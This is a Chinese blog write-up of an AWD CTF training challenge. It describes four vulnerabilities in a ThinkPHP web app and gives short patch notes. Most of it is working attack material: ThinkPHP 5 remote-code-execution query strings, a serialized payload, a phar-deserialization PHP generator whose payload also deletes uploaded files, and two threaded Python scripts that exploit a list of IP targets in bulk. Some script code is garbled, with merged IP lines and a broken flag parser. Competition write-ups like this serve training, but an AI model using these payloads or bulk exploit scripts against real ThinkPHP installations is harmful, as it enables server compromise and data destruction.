admin 管理员组文章数量: 887007
web1
这个题目我一共找到了四个漏洞。
Thinkphp5rce1
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
这个可以直接打,修复方案如下
在App.php
的第375行加入一个正则的过滤,即可修复,这个是官方的方法,因为thinkphp
我比较熟悉所以就直接按照官方的方法修复了。
thinkphp5rce2
s=cat /flag&_method=__construct&method=&filter[]=system
这个是通过post
方法进行传值,没有找到官方的修复方案,但事实上上面那个修了以后这个也就修掉了,为了保险起见我还是做了个双保险。在Request.php
里面粗暴的修复了一下
反序列化1
链子还是很简单的,甚至没有链子,直接可以利用,就在入口文件index.php
中
然后这里简单的反序列化点在Index.php
中
修复方案,我是直接加了个正则进行替换,把所有字母替换成空,这里就没用了。但想想,这种方法还不如直接把代码删了。
批量利用脚本
import requestsimport refrom lxml import etreeimport timeimport threadingiptables = '''39.100.119.37:1018039.100.119.37:1038039.100.119.37:1048039.100.119.37:1058039.100.119.37:1068039.100.119.37:1078039.100.119.37:1088039.100.119.37:1098039.100.119.37:1108039.100.119.37:1118039.100.119.37:1128039.100.119.37:1138039.100.119.37:1148039.100.119.37:1158039.100.119.37:1168039.100.119.37:1178039.100.119.37:1188039.100.119.37:1198039.100.119.37:1208039.100.119.37:1218039.100.119.37:1228039.100.119.37:1238039.100.119.37:12480'''.split('\n')def find_flag(data): reg = "flag{(.*?)}" tmp = re.findall(reg, data) result = [] for i in tmp: i = 'flag{'+i+'}' return idef ip_log(flag): f = open('flag1.txt', 'a') f.write(flag + "\n") f.close()def attack(ip): url2 = "http://" + ip + "/?s=index/index/unse&a=Tzo0OiJDb3JlIjoxOntzOjQ6ImRhdGEiO3M6MjA6InN5c3RlbSgnY2F0IC9mbGFnJyk7Ijt9" response = requests.get(url2) flag = find_flag(response.text) ip_log(flag) print(ip, ":", flag)for ip in iptables: t = threading.Thread(target=attack, args=(ip, )) t.start()
phar反序列化
这里有个上传功能,还有个文件读取功能,用脚趾头想想就知道是phar反序列化
修复方案我直接加了个过滤,把phar
协议给过滤掉了。
phar脚本
phpclass Core{
public $data; public function __construct(){
$this->data="system('cat /flag;rm rm /var/www/html/public/uploads/20200314/*');"; }}$obj = new Core();@unlink("yds.phar");$phar = new Phar("yds.phar");$phar->startBuffering();$phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>");$phar->setMetadata(new Core());$phar->addFromString("yds.txt", "yds_is_so_beautiful");$phar->stopBuffering();rename('yds.phar', 'yds.gif');
批量脚本
import requestsimport refrom lxml import etreeimport timeimport threadingfrom requests import sessioniptables = '''39.100.119.37:1018039.100.119.37:1038039.100.119.37:1048039.100.119.37:1058039.100.119.37:1068039.100.119.37:1078039.100.119.37:1088039.100.119.37:1098039.100.119.37:1108039.100.119.37:1118039.100.119.37:1128039.100.119.37:1138039.100.119.37:1148039.100.119.37:1158039.100.119.37:1168039.100.119.37:1178039.100.119.37:1188039.100.119.37:1198039.100.119.37:1208039.100.119.37:1218039.100.119.37:1228039.100.119.37:1238039.100.119.37:12480'''.split('\n')def find_flag(data): reg = "flag{(.*?)}" tmp = re.findall(reg, data) result = [] for i in tmp: i = 'flag{'+i+'}' return idef ip_log(flag): f = open('flag1.txt', 'a') f.write(flag + "\n") f.close()def attack(ip): url1 = "http://"+ip+"/index.php/Index/index/upload" files = {
'image': open('yds.gif', 'rb')} s = session() response = s.post(url1, files=files) url2 = "http://"+ip+"/?file=phar://uploads/" + response.text.split('.gif')[0] + '.gif' response2 = s.get(url2) flag = find_flag(response2.text) ip_log(flag) print(ip, ":", flag)for ip in iptables: t = threading.Thread(target=attack, args=(ip, )) t.start()
版权声明:本文标题:awd的批量脚本 pwn_星盟安全团队AWD训练赛 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1732183494h1525543.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论